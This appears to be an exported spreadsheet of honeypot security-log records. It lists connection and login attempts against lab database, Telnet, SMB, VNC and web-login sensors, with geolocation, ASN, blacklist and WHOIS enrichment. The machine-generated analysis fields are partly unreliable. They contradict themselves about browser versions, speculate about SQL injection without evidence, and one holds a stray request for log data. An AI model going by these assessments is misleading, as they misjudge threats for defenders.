    <s v="2005-08-18 02:10:45"/>
    <s v="2027-01-16 04:59:59"/>
    <s v="2024-01-29 18:09:26"/>
    <s v="['NS-1321.AWSDNS-37.ORG', 'NS-1670.AWSDNS-16.CO.UK', 'NS-27.AWSDNS-03.COM', 'NS-967.AWSDNS-56.NET']"/>
    <s v="MarkMonitor, Inc."/>
    <s v="['clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited', 'clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited', 'serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited', 'serverTransferProhibited https://icann.org/epp#serverTransferProhibited', 'serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited', 'clientUpdateProhibited (https://www.icann.org/epp#clientUpdateProhibited)', 'clientTransferProhibited (https://www.icann.org/epp#clientTransferProhibited)', 'clientDeleteProhibited (https://www.icann.org/epp#clientDeleteProhibited)', 'serverUpdateProhibited (https://www.icann.org/epp#serverUpdateProhibited)', 'serverTransferProhibited (https://www.icann.org/epp#serverTransferProhibited)', 'serverDeleteProhibited (https://www.icann.org/epp#serverDeleteProhibited)']"/>
    <s v="Legal Department"/>
    <x v="12"/>
    <s v="NA"/>
    <s v="PO BOX 81226"/>
    <s v="::ffff:1261:527"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low&amp;&amp;Medium"/>
    <s v="This suggests an unsuccessful attempt to exploit a database vulnerability, likely targeting the Oracle service. The fact that it's marked as &quot;Not Available&quot; implies the attack was unsuccessful or the target is not accessible. It may be an automated scanning activity trying to identify vulnerabilities."/>
    <m/>
  </r>
  <r>
    <x v="643"/>
    <x v="643"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T18:02:42"/>
    <d v="2025-04-27T09:20:19"/>
    <d v="2025-04-27T18:02:42"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H15"/>
    <s v="3306"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="TX"/>
    <s v="Texas"/>
    <s v="Dallas"/>
    <s v="Dallas"/>
    <s v="4684888"/>
    <s v="75270"/>
    <s v="32.7767"/>
    <s v="-96.797"/>
    <s v="212238"/>
    <s v="Datacamp Limited"/>
    <s v="Datacamp Limited"/>
    <s v="hosting"/>
    <s v="Cdnext DAL"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2513:c8a4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="This data indicates an attempt to access MySQL service without providing any credentials, which may be a scanning activity for potential SQL injection vulnerabilities. The lack of valid credentials suggests the attacker is trying to exploit weaknesses. This behavior could be indicative of reconnaissance efforts. &amp;&amp; The data indicates an attempt to exploit a vulnerability in a MySQL database service, likely by a malicious user trying to gain unauthorized access or extract sensitive information from the system is accessing and is attempting to query or access resources it does not have access to. This could be related to SQL injection attack attempts."/>
    <m/>
  </r>
  <r>
    <x v="644"/>
    <x v="644"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T18:01:45"/>
    <d v="2025-04-27T18:01:45"/>
    <d v="2025-04-27T18:01:45"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>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f1:b09a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No malicious activity detected, service is inactive or unavailable for TELNET connection attempts. &amp;&amp; No activity detected in TELNET service. Service is inactive or unresponsive. No suspicious connection attempts were made to this service."/>
    <s v="Scanning Attempt"/>
  </r>
  <r>
    <x v="645"/>
    <x v="645"/>
    <s v="n106-70-170-64.sun21.vic.optusnet.com.au"/>
    <x v="0"/>
    <d v="2025-04-27T17:38:25"/>
    <d v="2025-04-27T17:38:25"/>
    <d v="2025-04-27T17:38:25"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Brute Force"/>
    <s v="high"/>
    <s v="SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1"/>
    <s v="443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="OC"/>
    <s v="Oceania"/>
    <s v="AU"/>
    <s v="Australia"/>
    <s v="VIC"/>
    <s v="Victoria"/>
    <s v="City of Brimbank"/>
    <s v="Sunshine West"/>
    <s v="9972578"/>
    <s v="3020"/>
    <s v="-37.7947"/>
    <s v="144.819"/>
    <s v="4804"/>
    <s v="MPX-AS"/>
    <s v="SingTel Optus Pty Ltd"/>
    <s v="corporate"/>
    <s v="Optus Internet Pty Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{HTTP_LOGIN:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2024-08-13 05:03:35"/>
    <s v="['ns2.optusnet.com.au', 'ns1.optusnet.com.au']"/>
    <s v="Corporation Service Company (Aust) Pty Ltd"/>
    <s v="['serverDeleteProhibited https://identitydigital.au/get-au/whois-status-codes#serverDeleteProhibited', 'serverRenewProhibited https://identitydigital.au/get-au/whois-status-codes#serverRenewProhibited', 'serverTransferProhibited https://identitydigital.au/get-au/whois-status-codes#serverTransferProhibited', 'serverUpdateProhibited https://identitydigital.au/get-au/whois-status-codes#serverUpdateProhibited']"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6a46:aa40"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="High"/>
    <s v="An unknown user is attempting to log in using a web service from an IP likely associated with MacOS, possibly using Google Chrome version 134. &amp;&amp; An unknown client is attempting to access a website's login page using Google Chrome on a Mac with a suspiciously high browser version. This could be a malicious bot or script trying to gain unauthorized access. The client's user agent string suggests a fake or outdated browser version, raising suspicions about the legitimacy of this activity."/>
    <m/>
  </r>
  <r>
    <x v="646"/>
    <x v="646"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T17:33:51"/>
    <d v="2025-04-27T17:33:51"/>
    <d v="2025-04-27T17:33:51"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>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df:5c13"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="There is no log activity detected for this service. This could be due to the service being inactive or the lack of any malicious attempts. No suspicious connections were made. &amp;&amp; No activity detected in the telnet service, suggesting that potential attackers were likely scanning or probing for vulnerabilities. This could be an initial reconnaissance step before launching a more targeted attack. The lack of activity may indicate that the scan was blocked or the attacker moved on."/>
    <m/>
  </r>
  <r>
    <x v="647"/>
    <x v="647"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T17:17:29"/>
    <d v="2025-04-27T17:17:29"/>
    <d v="2025-04-27T17:17:29"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Phaya Thai"/>
    <s v="Phaya Thai"/>
    <s v="7026870"/>
    <s v="NA"/>
    <s v="13.7801"/>
    <s v="100.543"/>
    <s v="23969"/>
    <s v="TOT-NET"/>
    <s v="TOT Public Company Limited"/>
    <s v="corporate"/>
    <s v="TOT Public Company Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:656d:7e21"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No suspicious activity detected for Telnet service, as there is no established connection or login attempt. Data for this service is unknown or unavailable. No malicious behavior recorded. &amp;&amp; No TELNET activity detected, but possibly attempted or monitored. The absence of data suggests either no interaction or an unsuccessful connection attempt. The presence is considered NA which might indicate unknown or not applicable status."/>
    <m/>
  </r>
  <r>
    <x v="648"/>
    <x v="648"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T16:40:56"/>
    <d v="2025-04-27T16:40:56"/>
    <d v="2025-04-27T16:40:56"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai (Parel)"/>
    <s v="1275339"/>
    <s v="400012"/>
    <s v="19.0027"/>
    <s v="72.8286"/>
    <s v="17488"/>
    <s v="HATHWAY-NET-AP"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="consumer"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7361:7225"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="649"/>
    <x v="649"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T16:38:17"/>
    <d v="2025-01-03T19:29:07"/>
    <d v="2025-04-27T16:38:17"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'cbl.abuseat.org': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}"/>
    <n v="65"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TS"/>
    <s v="Telangana"/>
    <s v="Ranga Reddy"/>
    <s v="Chevella"/>
    <s v="1445121"/>
    <s v="501503"/>
    <s v="17.3135"/>
    <s v="78.1388"/>
    <s v="149422"/>
    <s v="VYBETELECOM"/>
    <s v="Inet Fiber PVT LTD"/>
    <s v="residential"/>
    <s v="Inet Fiber PVT LTD"/>
    <s v="2016-07-06"/>
    <s v="INETFIB"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6744:b0ec"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="650"/>
    <x v="650"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T16:28:39"/>
    <d v="2025-04-27T16:28:39"/>
    <d v="2025-04-27T16:28:39"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb2:eb66"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Possible SQL injection attempt, as MSSQL service is being accessed without credentials or authentication information provided. This could be an attempt to exploit vulnerability or extract sensitive data. Unauthorized access attempt detected for MSSQL database management system. &amp;&amp; Possible attempts to access Microsoft SQL Server databases without permission, potentially leading to unauthorized access or data theft. The activity suggests an attempt to exploit the database system for malicious purposes. No authentication information is provided, indicating a potential vulnerability or brute-force attack."/>
    <m/>
  </r>
  <r>
    <x v="651"/>
    <x v="651"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T16:02:03"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-27T16:02:03"/>
    <n v="145"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_DNS_H43&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;53&amp;&amp;21507&amp;&amp;3306&amp;&amp;445&amp;&amp;57445"/>
    <s v="True"/>
    <s v="{'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Ramanagara"/>
    <s v="Closepet"/>
    <s v="1258744"/>
    <s v="NA"/>
    <s v="12.7402"/>
    <s v="77.3864"/>
    <s v="24186"/>
    <s v="RailTel Corporation of India Ltd."/>
    <s v="RailTel Corporation Of India Ltd."/>
    <s v="business"/>
    <s v="M/s Namdhari Seeds Pvt Ltd."/>
    <s v="2006-11-16"/>
    <s v="Namdhari-IN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (122.252.231.173,54888)}&amp;&amp;{Data_SMB:Incoming connection (122.252.231.173,55896)}&amp;&amp;{Data_SMB:Incoming connection (122.252.231.173,52605)}&amp;&amp;{Data_SMB:Incoming connection (122.252.231.173,62761)}&amp;&amp;{Data_SMB:Incoming connection (122.252.231.173,63488)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (122.252.231.173,62845)}&amp;&amp;{Data_SMB:Incoming connection (122.252.231.173,63969)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (122.252.231.173,49736)}&amp;&amp;{Data_SMB:Incoming connection (122.252.231.173,50382)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7afc:e7ad"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="An incoming SMB connection from an unknown IP address suggests potential unauthorized access to shared resources or data exfiltration attempts._x000a_This could be an indication of malware spreading or lateral movement within a network._x000a_Further investigation is necessary to determine the intentions and impact of this activity. &amp;&amp; A potentially malicious device from IP address 122.252.231.173 is attempting to initiate an SMB connection._x000a_This could be an attempt to access sensitive files or exploit vulnerabilities on the targeted system._x000a_It may also indicate a brute-force attack or unauthorized access attempt. &amp;&amp; A user has authenticated to an SMB service using basic credentials, indicating possible unauthorized access attempt or brute force attack. This may be an indication of malicious activity, such as attempted unauthorized file access or data theft. It could also indicate a vulnerability in the system's authentication mechanism. &amp;&amp; Possible malicious activity detected: User attempted to authenticate with administrative privileges via SMB using basic authentication credentials. This may indicate an attempt to gain unauthorized access to the system or exploit vulnerabilities. The user's name is hidden behind a dot notation, which could be an evasion technique. &amp;&amp; MySQL database connection attempt failed, possibly due to authentication issues or service unavailability._x000a_The connection attempt may be a reconnaissance probe by an attacker._x000a_This could be a precursor to further malicious activity such as SQL injection attacks. &amp;&amp; An unknown entity is attempting to connect to MySQL database services, indicating possible database scanning or unauthorized access attempts. This activity suggests an attempt to exploit vulnerabilities or gain unauthorized access. The outcome of this attempt is unclear due to lack of further information in the log entry."/>
    <s v="SMB Attack &amp;&amp; SMB Attack"/>
  </r>
  <r>
    <x v="652"/>
    <x v="652"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T15:50:00"/>
    <d v="2025-04-27T14:51:11"/>
    <d v="2025-04-27T15:50:00"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Los Angeles"/>
    <s v="Los Angeles"/>
    <s v="5368361"/>
    <s v="90009"/>
    <s v="34.0549"/>
    <s v="-118.243"/>
    <s v="11878"/>
    <s v="tzulo, inc."/>
    <s v="tzulo, inc."/>
    <s v="hosting"/>
    <s v="Riaan Aspeling"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c62c:8153"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="653"/>
    <x v="653"/>
    <s v="58-178-32-93.dyn.dodo.net.au"/>
    <x v="0"/>
    <d v="2025-04-27T15:46:01"/>
    <d v="2025-04-27T15:46:01"/>
    <d v="2025-04-27T15:46:01"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Brute Force"/>
    <s v="high"/>
    <s v="SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1"/>
    <s v="443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="OC"/>
    <s v="Oceania"/>
    <s v="AU"/>
    <s v="Australia"/>
    <s v="NSW"/>
    <s v="New South Wales"/>
    <s v="North Sydney Council"/>
    <s v="North Sydney"/>
    <s v="2154855"/>
    <s v="2055"/>
    <s v="-33.8392"/>
    <s v="151.207"/>
    <s v="9443"/>
    <s v="VOCUS-RETAIL-AU"/>
    <s v="Vocus PTY LTD"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{HTTP_LOGIN:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2025-03-27 14:17:02"/>
    <s v="['dns1.dodo.com.au', 'dns2.dodo.com.au']"/>
    <s v="Domain Directors Pty Ltd trading as Instra"/>
    <s v="serverRenewProhibited https://identitydigital.au/get-au/whois-status-codes#serverRenewProhibited"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3ab2:205d"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="High"/>
    <s v="A user attempted to log in using an HTTP request with a suspicious browser fingerprint, possibly indicating credential stuffing or brute-force login attempts from an automated tool. The browser identification suggests a fake or spoofed user agent. This could be part of a larger phishing or account compromise campaign. &amp;&amp; A malicious login attempt has been detected from a Windows machine using Google Chrome browser with an outdated version of the browser. The version 135 is suspiciously low and possibly indicates a fake or compromised system. This could be a sign of automated bot activity trying to gain unauthorized access."/>
    <m/>
  </r>
  <r>
    <x v="654"/>
    <x v="654"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T15:16:50"/>
    <d v="2025-04-14T03:12:22"/>
    <d v="2025-04-27T15:16:50"/>
    <n v="31"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NKT"/>
    <s v="Kwai Tsing"/>
    <s v="NA"/>
    <s v="Tsing Yi Town"/>
    <s v="1818483"/>
    <s v="NA"/>
    <s v="22.3484"/>
    <s v="114.112"/>
    <s v="9304"/>
    <s v="HGC Global Communications Limited"/>
    <s v="HGC Global Communications Limited"/>
    <s v="business"/>
    <s v="HGC Global Communications Limited"/>
    <s v="2010-08-05"/>
    <s v="HGCGLOBAL-HK"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:df12:d89c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No log data provided, cannot analyze activity. &amp;&amp; No malicious activity detected for TELNET service, as &quot;NA&quot; indicates no attempts or connections made. No unusual behavior or login attempts were recorded. The log simply shows that the service is inactive or idle."/>
    <s v="I need log data to analyze the attacks! Please provide it, and I'll be happy to assist. _x000a__x000a_(Once you provide the log data, I'll come up with a list of attack names in a short phrase each.)"/>
  </r>
  <r>
    <x v="655"/>
    <x v="655"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T15:11:32"/>
    <d v="2025-02-24T16:56:32"/>
    <d v="2025-04-27T15:11:32"/>
    <n v="106"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_HC1"/>
    <s v="5900&amp;&amp;389&amp;&amp;3389&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="HoneyPot BlackListed IP"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NL"/>
    <s v="The Netherlands"/>
    <s v="LI"/>
    <s v="Limburg"/>
    <s v="Kerkrade Municipality"/>
    <s v="Eygelshoven"/>
    <s v="2756285"/>
    <s v="6471"/>
    <s v="50.8956"/>
    <s v="6.06924"/>
    <s v="214943"/>
    <s v="Railnet LLC"/>
    <s v="Virtualine Technologies"/>
    <s v="business"/>
    <s v="Individual entrepreneur Dyachenko Valentina Ivanovna"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_VNC:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5e9a:237a"/>
    <s v="C-I"/>
    <s v="medium"/>
    <s v="Low"/>
    <s v="No log data is available, so there's nothing to analyze or report on possible malicious activity."/>
    <m/>
  </r>
  <r>
    <x v="656"/>
    <x v="656"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T15:01:54"/>
    <d v="2025-04-27T15:01:54"/>
    <d v="2025-04-27T15:01:54"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Brute Force"/>
    <s v="high"/>
    <s v="SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1"/>
    <s v="443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Los Angeles"/>
    <s v="Los Angeles"/>
    <s v="5368361"/>
    <s v="90009"/>
    <s v="34.0549"/>
    <s v="-118.243"/>
    <s v="21859"/>
